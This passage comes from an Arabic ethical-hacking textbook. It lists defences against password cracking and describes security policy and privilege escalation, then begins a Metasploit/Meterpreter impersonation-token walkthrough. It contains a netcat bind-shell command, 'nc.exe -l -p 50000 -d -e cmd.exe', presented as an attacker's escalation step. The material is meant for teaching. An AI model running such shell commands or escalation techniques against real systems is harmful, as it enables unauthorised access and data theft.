‫ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ھﻧﺎك ﺑﻌض اﻟطرق اﻟﺗﻲ ﺗﺳﺎﻋدك ﻋﻠﻰ اﻟدﻓﺎع ﻋن ﻧﻔﺳك ﺿد ﺗﻛﺳﯾر ﻛﻠﻣﺔ ﻣرور وھم ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ -1‬ﻻ ﻧﺷﺎرك ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﻊ أي ﺷﺧص‪ ،‬ﺣﯾث أن ھذا ﯾﺳﻣﺢ ﻟﺷﺧص آﺧر ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل‬
‫ﻣوظﻔﻲ اﻟدرﺟﺎت ودﻓﻊ اﻟﺑﯾﺎﻧﺎت واﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻘﺗﺻر ﻋﺎدة ﻟك‪.‬‬
‫‪ -2‬ﻻ ﺗﺳﺗﺧدم ﻧﻔس ﻛﻠﻣﺔ اﻟﻣرور أﺛﻧﺎء ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬أو أي واﺣد ﻣﺗﺷﺎﺑﮫ إﻟﻰ ﺣد ﻛﺑﯾر ﻣﻊ اﻟﻣﺳﺗﺧدﻣﺔ ﺳﺎﺑﻘﺎ‪.‬‬
‫‪ -3‬ﺗﻣﻛﯾن ﺗدﻗﯾﻖ اﻷﻣﺎن ﻟﻠﻣﺳﺎﻋدة ﻋﻠﻰ رﺻد وﺗﺗﺑﻊ ھﺟﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪ -4‬ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ﻓﻲ اﻟﻘﺎﻣوس‪.‬‬
‫‪ -5‬ﻻ ﺗﺳﺗﺧدم اﻟﺑروﺗوﻛوﻻت ذات اﻟﻧص اﻟواﺿﺢ واﻟﺑروﺗوﻛوﻻت ذات اﻟﺗﺷﻔﯾر اﻟﺿﻌﯾف ﻓﻲ اﺗﺻﺎﻻﺗﮭم‪.‬‬
‫‪ -6‬ﺗﻌﯾﯾن ﻧﮭﺞ ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور)‪ (password change policy‬ﻛﻠﻣﺎ ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ‪ ،‬أي‪ ،‬ﻛل ‪ 30‬ﯾوﻣﺎ‪.‬‬
‫‪ -7‬ﺗﺟﻧب ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻣﻛﺎن ﻏﯾر ﻣﺿﻣون ﻷن ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ أﻣﺎﻛن ﻣﺛل ﻣﻠﻔﺎت اﻟﻛﻣﺑﯾوﺗر ﯾﺗﻌرﺿون‬
‫ﺑﺳﮭوﻟﺔ ﻟﻠﮭﺟﻣﺎت‪.‬‬
‫‪ -8‬ﻻ ﺗﺳﺗﺧدم ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻷي ﻧظﺎم‪.‬‬
‫‪ -9‬ﺟﻌل ﻣن اﻟﺻﻌب ﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﺛﻣﺎﻧﯾﺔ إﻟﻰ اﺛﻧﻲ ﻋﺷر ﺣرﻓﺎ ورﻗﻣﺎ ﻓﻲ ﻣزﯾﺞ ﻣن اﻷﺣرف اﻟﻛﺑﯾرة واﻟﺻﻐﯾرة واﻷرﻗﺎم‬
‫واﻟرﻣوز‪ .‬ﻛﻠﻣﺎت ﻣرور ﻗوﯾﺔ ﯾﺻﻌب ﺗﺧﻣﯾﻧﮭﺎ‪ .‬ﻛﻠﻣﺎ ازداد ﺗﻌﻘﯾد ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻛﻠﻣﺎ ﻗل ﺧﺿوﻋﮭﺎ ﻟﻠﮭﺟﻣﺎت‪.‬‬
‫‪ -10‬ﺗﺄﻛد ﻣن أن اﻟﺗطﺑﯾﻘﺎت ﻻ ﺗﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟذاﻛرة أو اﻟﻛﺗﺎﺑﺔ إﻟﻰ اﻟﻘرص‪ .‬إذا ﺗم ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟذاﻛرة ﻓﺎن‬
‫ﻛﻠﻣﺎت اﻟﺳر ﯾﻣﻛن ﺳرﻗﺗﮭﺎ‪ .‬وﺑﻣﺟرد ﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻣن اﻟﺳﮭل ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﺻﻌﯾد ﺣﻘوﻗﮭم ﻓﻲ اﺳﺗﺧدام اﻟﺗطﺑﯾﻖ‪.‬‬
‫‪ -11‬اﺳﺗﺧدام ﺳﻠﺳﻠﺔ ﻋﺷواﺋﯾﺔ )‪ (salt‬ﻓﻲ أوﻟﮫ أو أﺧره )‪ (prefix or suffix‬ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗﺑل ﺗﺷﻔﯾره‪ .‬ﺣﯾث ﯾﺳﺗﺧدم ھذا ﻹﺑطﺎل‬
‫‪ pre-computation‬و‪ .memorization‬ﺣﯾث ﻧﺟد ان ‪ salt‬ﻋﺎدة ﻣﺧﺗﻠف ﻟﺟﻣﯾﻊ اﻷﻓراد‪ ،‬ﻓﺈﻧﮫ ﻣن ﻏﯾر اﻟﻌﻣﻠﻲ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﻧﺎء‬
‫اﻟﺟداول ﻣﻊ ﻧﺳﺧﺔ ﻣﺷﻔرة واﺣد ﻣن ﻛل ﻛﻠﻣﺔ اﻟﻣرور‪ .‬أﻧظﻣﺔ ﯾوﻧﯾﻛس ﻋﺎدة ﺗﺳﺗﺧدم ‪.12 bit salt‬‬
‫‪ -12‬ﺗﻣﻛﯾن ‪ SYSKEY‬ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻗوﯾﺔ ﻟﺗﺷﻔﯾر وﺣﻣﺎﯾﺔ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .SAM‬ﻋﺎدة‪ ،‬ﯾﺗم ﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎﺑﺎت‬
‫اﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ .SAM‬ﻓﻣن اﻟﺳﮭل ﺟدا ﻟﻠﺑرﻧﺎﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور اﺳﺗﮭداف ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ SAM‬ﻟﻠوﺻول إﻟﻰ‬
‫ﻛﻠﻣﺎت اﻟﺳر ﻟﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﻟذا‪ ،‬ﻟﺗﺟﻧب ﻣﺛل ھذه اﻟﺣﺎﻻت‪ SYSKEY ،‬ﯾﺄﺗﻲ ﻓﻲ اﻟﺻورة‪ SYSKEY .‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ‬
‫ﻟﻠﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ ﻣرور ﺣﺳﺎب اﻟﻣﺳﺗﺧدم ‪ ،‬أي اﻟﻣﺧزﻧﺔ ﻓﻲ ﺑﯾﺎﻧﺎت ‪ SAM‬ﺿد ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺔ اﻟﻣرور ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت اﻟﺗﺷﻔﯾر‬
‫اﻟﻘوﯾﺔ‪ .‬ﺣﯾث اﻧﮫ أﻛﺛر ﺻﻌوﺑﺔ اﺗﺧﺎذ اﺟراءات ﻛﺳر ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺷﻔرة ﻋن ﻣﻌﻠوﻣﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻏﯾر ﻣﺷﻔرة‪.‬‬
‫‪ -13‬ﻻ ﺗﺳﺗﺧدم أﺑدا اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ وﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك ﻣﺛل ﺗﺎرﯾﺦ اﻟﻣﯾﻼد‪ ،‬اﻟزوج‪ ،‬أو اﻟطﻔل أو اﺳم ﺣﯾوان أﻟﯾف‪ .‬إذا ﻛﻧت‬
‫ﺗﺳﺗﺧدم ﻣﺛل ﻛﻠﻣﺎت اﻟﺳر ھذه‪ ،‬ﻓﺎﻧﮫ ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﺟدا ﻟﻠﻧﺎس اﻟذﯾن ھم ﻗرﯾب ﻣﻧك ﻛﺳر ﺗﻠك اﻟﻛﻠﻣﺎت‪.‬‬
‫‪ -14‬ﻣراﻗﺑﺔ ﺳﺟﻼت اﻟﺧﺎدم ﻟﻠﻛﺷف ﻋن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ )‪ (Brute Force attack‬ﻋﻠﻰ ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬ﻋﻠﻰ اﻟرﻏم ﻣن‬
‫أن ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ‪ ،‬ﯾﺻﻌب إﯾﻘﺎﻓﮭﺎ‪ ،‬وﻟﻛن ﯾﻣﻛن رﺻدھﺎ ﺑﺳﮭوﻟﺔ ﻣن ﺧﻼل رﺻد ﺳﺟل ﺧﺎدم اﻟوﯾب‪ .‬ﺣﯾث ان ﻣﻊ ﻛل ﻣﺣﺎوﻟﺔ‬
‫ﺗﺳﺟﯾل دﺧول ﻓﺎﺷﻠﺔ‪ ،‬ﯾﺗم ﺗﺳﺟﯾل ‪ HTTP 401 status code‬ﻓﻲ ﺳﺟﻼت ﺧﺎدم اﻟوﯾب اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -15‬ﻗﻔل اﻟﺣﺳﺎب ﺿد اﻟﺗﻌرض ﻟﻌدد ﻛﺑﯾر ﺟدا ﻣن اﻟﺗﺧﻣﯾﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور اﻟﻐﯾر ﺻﺣﯾﺣﺔ وﺗﺳﻣﻰ ‪ .password throttling‬ھذا ﯾوﻓر‬
‫اﻟﺣﻣﺎﯾﺔ ﺿد ھﺟﻣﺎت اﻟﻘوة اﻟﻐﺎﺷﻣﺔ واﻟﺗﺧﻣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪393‬‬

‫ﺗﻧﻔﯾذ وﻓرض ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ ‪Implement and Enforce A Strong Security Policy‬‬

‫ﺗوﻓر ﺳﯾﺎﺳﺔ أﻣن ﻗوﯾﺔ اﻷﺳس ﻣن أﺟل اﻟﺗﻧﻔﯾذ اﻟﻧﺎﺟﺢ ﻟﻠﻣﺷﺎرﯾﻊ اﻟﻣﺗﺻﻠﺔ ﺑﺎﻷﻣن ﻓﻲ اﻟﻣﺳﺗﻘﺑل؛ وھذا ھو أول إﺟراء ﯾﺟب اﺗﺧﺎذھﺎ ﻟﻠﺣد ﻣن‬
‫ﻣﺧﺎطر اﺳﺗﺧدام اﻋﺗراض ﻣن أي ﻣن ﻣﺻﺎدر اﻟﻣﻌﻠوﻣﺎت ﻓﻲ اﻟﺷرﻛﺔ‪ .‬اﻟﺧطوة اﻷوﻟﻰ ﻧﺣو زﯾﺎدة أﻣن اﻟﺷرﻛﺔ ھو إدﺧﺎل وﺗﻧﻔﯾذ ﺳﯾﺎﺳﺔ اﻷﻣن‪.‬‬
‫ﻓﺈن اﻟﺳﯾﺎﺳﺔ ﺗﺻف أﯾﺿﺎ ﺑﺗﻔﺻﯾل ﻣﻌﻧﻰ اﻻﺳﺗﺧدام اﻟﻣﻘﺑول‪ ،‬ﻓﺿﻼ ﻋن إدراج اﻷﻧﺷطﺔ اﻟﻣﺣظورة‪.‬‬

‫اﻟﺗﻧﻔﯾذ اﻟﺳﻠﯾم ﻟﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﻗوﯾﺔ ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ ﻷﻧﮭﺎ ﺳوف ﺗﺗﺣول ﻟﯾس ﻓﻘط ﻟﺟﻣﯾﻊ اﻟﻣوظﻔﯾن اﻟﺧﺎص ﺑك إﻟﻰ اﻟﻣﺷﺎرﻛﯾن ﻓﻲ ﺟﮭود اﻟﺷرﻛﺔ ﻟﺗﺄﻣﯾن‬
‫اﻻﺗﺻﺎﻻت‪ ،‬وﻟﻛن أﯾﺿﺎ ﯾﺳﺎﻋد ﻋﻠﻰ اﻟﺗﻘﻠﯾل ﻣن ﺧطر ﺣدوث ﺧرق أﻣﻧﻲ ﻣﺣﺗﻣل ﻣن ﺧﻼل اﻷﺧطﺎء " اﻹﻧﺳﺎن ﻋﺎﻣل “‪ .‬ھذه ﻋﺎدة ﻣﺎ ﺗﻛون‬
‫ﻗﺿﺎﯾﺎ ﻣﺛل اﻟﻛﺷف ﻋن اﻟﻣﻌﻠوﻣﺎت )ﻏﯾر اﻟﻣﺻرح ﺑﮫ( ﻏﯾر ﻣﻌروف‪ ،‬واﺳﺗﺧدام ﻏﯾر آﻣن أو ﻏﯾر ﻻﺋﻖ ﻟﻺﻧﺗرﻧت واﻟﻌدﯾد ﻣن اﻷﻧﺷطﺔ اﻟﺧطرة‬
‫اﻷﺧرى‪.‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈن ﻋﻣﻠﯾﺔ وﺟود ﺳﯾﺎﺳﺔ أﻣﻧﯾﺔ ﺗﺳﺎﻋد أﯾﺿﺎ ﻋﻠﻰ ﺗﺣدﯾد اﻷﺻول اﻟﮭﺎﻣﺔ ﻟﻠﺷرﻛﺔ‪ ،‬واﻟطرق اﻟﺗﻲ ﺑﮭﺎ ﯾﺟب أن ﺗﻛون ﻣﺣﻣﯾﺔ‪،‬‬
‫وﺳﯾﻛون أﯾﺿﺎ ﺑﻣﺛﺎﺑﺔ وﺛﯾﻘﺔ ﻣرﻛزﯾﺔ‪ ،‬ﺑﻘدر ﻣﺎ ھو ﺣﻣﺎﯾﺔ اﻷﺻول اﻷﻣﻧﯾﺔ اﻟﻣﻌﻧﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪394‬‬

‫‪Escalating Privileges 5.4‬‬

‫ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات )‪ (Escalating privileges‬ھﻲ اﻟﻣرﺣﻠﺔ اﻟﺛﺎﻧﯾﺔ ﻣن ﻧظﺎم اﻟﻘرﺻﻧﺔ‪ .‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‪ ،‬ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟﻣﯾن ﻛﻠﻣﺎت اﻟﻣرور‬
‫اﻟﺗﻲ ﺗم ﻛﺳرھﺎ ﺳﺎﺑﻘﺎ ﻟﻠﺣﺻول ﻋﻠﻰ اﻣﺗﯾﺎزات ذات ﻣﺳﺗوى أﻋﻠﻰ ﻣن أﺟل ﺗﻧﻔﯾذ ﻋﻣﻠﯾﺎت ﻣﮭﻣﮫ ﻟﻠﻐﺎﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف‪ .‬وھﻧﺎ ﺳوف ﻧوﺿﺢ‬
‫اﻷدوات واﻟﺗﻘﻧﯾﺎت اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣﺧﺗﻠﻔﺔ ﺑﺷﻛل واﺿﺢ ﻓﻲ اﻟﺷراﺋﺢ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫‪Privilege Escalation‬‬
‫ﻓﻲ ھﺟوم ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات‪ ،‬ﻓﺈن اﻟﻣﮭﺎﺟم ﯾﻛﺗﺳب اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺎت واﻟﺑﯾﺎﻧﺎت واﻟﺗطﺑﯾﻘﺎت اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ ﻣن ﺧﻼل اﻻﺳﺗﻔﺎدة ﻣن ﻋﯾوب‬
‫ﻓﻲ اﻟﺗﺻﻣﯾم‪ ،‬او ﻋﯾوب ﻓﻲ ﺗطﺑﯾﻖ اﻟﺑرﻣﺟﯾﺎت وإﻋداد أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑطرﯾﻘﺔ ﺳﯾﺋﺔ‪ ،‬اﻟﺦ‪.‬‬

‫ﺑﻣﺟرد اﻛﺗﺳﺎب اﻟﻣﮭﺎﺟم ﺣﻖ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﻟﻌﯾد ﻣﻊ اﺳم ﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﺻﺎﻟﺣﮫ‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾﺣﺎول زﯾﺎدة اﻣﺗﯾﺎزاﺗﮫ ﻣن ﺧﻼل‬
‫اﻟﺗﺻﻌﯾد اﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‪ ،‬ﻣﺛل ﺣﺳﺎب اﻟﻣﺳؤول)‪ . (Admin account‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻟدﯾﮫ ﺣﻖ‬
‫اﻟوﺻول إﻟﻰ ﺧﺎدم‪ ، WZK SP1‬ﻓﺎﻧﮫ ﯾﻣﻛﻧﮫ ﺗﺷﻐﯾل أداة ﻣﺛل ‪ ERunAs2X.exe‬ﻟﺗﺻﻌﯾد اﻣﺗﯾﺎزات إﻟﻰ اﻣﺗﯾﺎزات اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام"‬
‫‪ "nc.exe -I -p 50000 -d -e cmd.exe‬ﻣﻊ ھذه اﻻﻣﺗﯾﺎزات ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﺑﺳﮭوﻟﺔ‪ ،‬وﺣذف اﻟﻣﻠﻔﺎت‪ ،‬وﺣﺗﻰ ﯾﻣﻛﻧﮫ ﻧﺷر‬
‫اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬أي ﺑرﻧﺎﻣﺞ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ ﻣﺛل ﺣﺻﺎن طروادة‪ ،‬واﻟﻔﯾروﺳﺎت‪ ،‬اﻟﺦ ﻓﻲ اﻟﻧظم اﻟﺿﺣﯾﺔ‪.‬‬

‫ﻟذﻟك ﻓﺎن ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﻣطﻠوب وذﻟك ﻋﻧدﻣﺎ ﺗرﯾد اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ إﻟﻰ اﻷﻧظﻣﺔ اﻟﮭدف‪ .‬ﻓﻲ اﻷﺳﺎس‪ ،‬ﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات ﯾﺣدث‬
‫ﻓﻲ ﺷﻛﻠﯾن‪ .‬ھم ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ )‪ (vertical privilege escalation‬وﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ)‪. (Horizontal privilege escalation‬‬

‫ﺗﺻﻌﯾد اﻣﺗﯾﺎزات أﻓﻘﻲ)‪ : (Horizontal privilege escalation‬ﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم ﻏﯾر اﻟﻣﺻرح ﺑﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف‬
‫واﻻﻣﺗﯾﺎزات اﻷﺧرى اﻟﺗﻲ ﺗﻧﺗﻣﻲ إﻟﻰ أذن ﻣﺳﺗﺧدم أﺧر أي اﻻﺛﻧﯾن ﻟﮭم ﻧﻔس اﻣﺗﯾﺎزات اﻟوﺻول‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻣﺳﺗﺧدم ‪ A‬ﻟﻸﻧﺗرﻧت‬
‫اﻟﻣﺻرﻓﻲ ﯾﻣﻛﻧﮫ اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ‪ B‬اﻟﻣﺻرﻓﻲ ﺑﺳﮭوﻟﺔ‪.‬‬

‫ﺗﺻﻌﯾد اﻣﺗﯾﺎزات رأﺳﻲ)‪ : (vertical privilege escalation‬ﻓﯾﮫ ﯾﺣﺎول اﻟﻣﺳﺗﺧدم اﻟﻐﯾر ﻣﺻرح ﺑﮫ اﻟوﺻول إﻟﻰ اﻟﻣوارد واﻟوظﺎﺋف ﻟﻠﻣﺳﺗﺧدم‬
‫أﺧر ﻣﻊ اﻣﺗﯾﺎزات أﻋﻠﻰ‪ ،‬ﻣﺛل اﻟﺗطﺑﯾﻖ أو ﻣدﯾري ﻣوﻗﻊ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻟﺷﺧص ﯾؤدى اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت اﻟوﺻول إﻟﻰ‬
‫ﻣوﻗﻊ ﻣﻊ اﻣﺗﯾﺎزات ﻣدﯾر )‪.(Administrative functions‬‬

‫‪Privilege Escalation Tool: Active@ Password Changer‬‬

‫اﻟﻣﺻدر‪http://www.password-changer.com :‬‬
‫‪ Active@Password Changer‬ھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر ﺳواء ﺑﺈﻋﺎدة إﻧﺷﺎء او اﺳﺗرداد اﻟﻣﺳؤول اﻟﻣﺣﻠﻲ وﻛﻠﻣﺎت ﻣرور اﻟﻣﺳﺗﺧدم‬
‫وذﻟك ﻋﻧد ﻓﻘدان او ﻧﺳﯾﺎن ﻛﻠﻣﺎت ﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺋوﻟﻲ اﻹدارة أو إذا ﺗم ﻏﻠﻖ ﺣﺳﺎب اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول أو ﻋطل‪ .‬وﺗﺷﻣل اﻟﺳﻣﺎت‬
‫اﻟرﺋﯾﺳﯾﺔ ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻣن أﻗﺳﺎم ﻣﺗﻌددة واﻷﻗراص اﻟﺻﻠﺑﺔ‪ ،‬ﻋرض واﻟﻛﺷف ﻋن ﺟﻣﯾﻊ ﻗواﻋد ﺑﯾﺎﻧﺎت ﻣﺎﯾﻛروﺳوﻓت اﻷﻣن‪ ،‬إﻋﺎدة‬
‫ﺗﻌﯾﯾن ‪ /‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺳﺗﺧدم اﻟﻣﺳؤول‪ ،‬وﻋرض ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أي ﺣﺳﺎب ﻣﺳﺗﺧدم ﻣﺣﻠﻲ‪ ،‬اﻟﺦ‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪395‬‬

‫‪Using Impersonation Tokens‬‬

‫ﺑﻌد أن ﺗﻛون ﻗد ﺗﻣﻛﻧت ﻣن اﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزاﺗك ﻗدر اﻹﻣﻛﺎن‪ .‬ﻋﻣوﻣﺎ‪ ،‬ﺑﻌد اﻟوﺻول‬
‫اﻟﻰ اﻟﺟﮭﺎز ﻓﺈﻧك ﺗﻣﻠك اﻟوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺳﺗﺧدم ﻟدﯾﮫ اﻣﺗﯾﺎزات ﻣﻧﺧﻔﺿﺔ )ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر(؛ وﻣﻊ ذﻟك‪ ،‬ﻗد ﯾﻛون ھدﻓﻧﺎ ھو ﺣﺳﺎب‬
‫اﻟﻣﺳؤول‪ .‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺑﻌض اﻟطرق ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات اﻟﺧﺎﺻﺔ ﺑك‪.‬‬

‫ﻓﻲ ھذا اﻟﺟزء‪ ،‬ﺳوف ﻧﺗﻌﻠم ﻛﯾﻔﯾﺔ اﻧﺗﺣﺎل ﺷﺧﺻﯾﺔ ﻣﺳﺗﺧدم آﺧر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﺎﺳﺗﺧدام رﻣوز اﻻﻧﺗﺣﺎل)‪. (impersonation tokens‬‬
‫اﻟرﻣوز)‪ (Tokens‬ﺗﺣﺗوي ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻷﻣﻧﯾﺔ ﻟﺟﻠﺳﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﯾث ﺗﺣدد اﻟﻣﺳﺗﺧدﻣﯾن واﻟﻣﺟﻣوﻋﺎت ﻟﻠﻣﺳﺗﺧدم‪ ،‬واﻻﻣﺗﯾﺎزات‬
‫ﻟﻠﻣﺳﺗﺧدم‪ .‬ﻋﻧد ﺗﺳﺟﯾل دﺧول ﻣﺳﺗﺧدم ﻓﻲ ﻧظﺎم وﯾﻧدوز‪ ،‬ﻓﺈﻧﮭﺎ ﺗﻘدم ﻟﮫ رﻣز وﺻول)‪ (access token‬ﻛﺟزء ﻣن ﺟﻠﺳﺔ اﻟﻣﺻﺎدﻗﺔ‪ .‬رﻣوز‬
‫اﻻﻧﺗﺣﺎل )‪ (impersonation tokens‬ﺗﺳﻣﺢ ﻟﻧﺎ ﺑﺗﺻﻌﯾد اﻣﺗﯾﺎزات ﻟدﯾﻧﺎ ﻋن طرﯾﻖ اﻧﺗﺣﺎل ﻣﺳﺗﺧدم اﺧر‪ .‬ﺣﺳﺎب اﻟﻧظﺎم)‪، (system account‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﺗﺣﺗﺎج إﻟﻰ ﺗﺷﻐﯾل ﻛﻣﺳﺗﺧدم ﻣﺳؤول ﻟدوﻣﯾن ﻟﻠﺗﻌﺎﻣل ﻣﻊ ﻣﮭﻣﺔ ﻣﺣددة ﺛم ﺗﺗﻧﺎزل ﻋن ھذه اﻟﺳﻠطﺔ ﻋﻧد اﻻﻧﺗﮭﺎء‪ .‬ﻧﺣن ﺳوف‬
‫ﺗﺳﺗﺧدم ھذا اﻟﺿﻌف ﻟرﻓﻊ ﺣﻘوق اﻟوﺻول ﻟدﯾﻧﺎ‪.‬‬

‫ﻧﺑدأ اﻻن اﺳﺗﻛﺷﺎف رﻣوز اﻻﻧﺗﺣﺎل )‪ (impersonation tokens‬ﻣن ﺧﻼل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ .Meterpreter‬وﯾﺗم ذﻟك ﻣن‬ ‫‪-‬‬
‫ﺧﻼل اﺳﺗﺧدام ‪ Metasploit‬ﻟﻣﮭﺎﺟﻣﺔ اﻟﻣﺿﯾف ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ Meterpreter‬ﻛﻣﺎ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ‪.‬‬
‫ﻟﺗﺳﮭﯾل اﻻﻣر ﺳوف ﻧﺳﺗﺧدم ‪ armitage‬ﻛﺎﻻﺗﻰ وﻧﺣﺻل ﻣن ﺧﻼﻟﮫ ﻗذﯾﻔﺔ ‪:Meterpreter‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


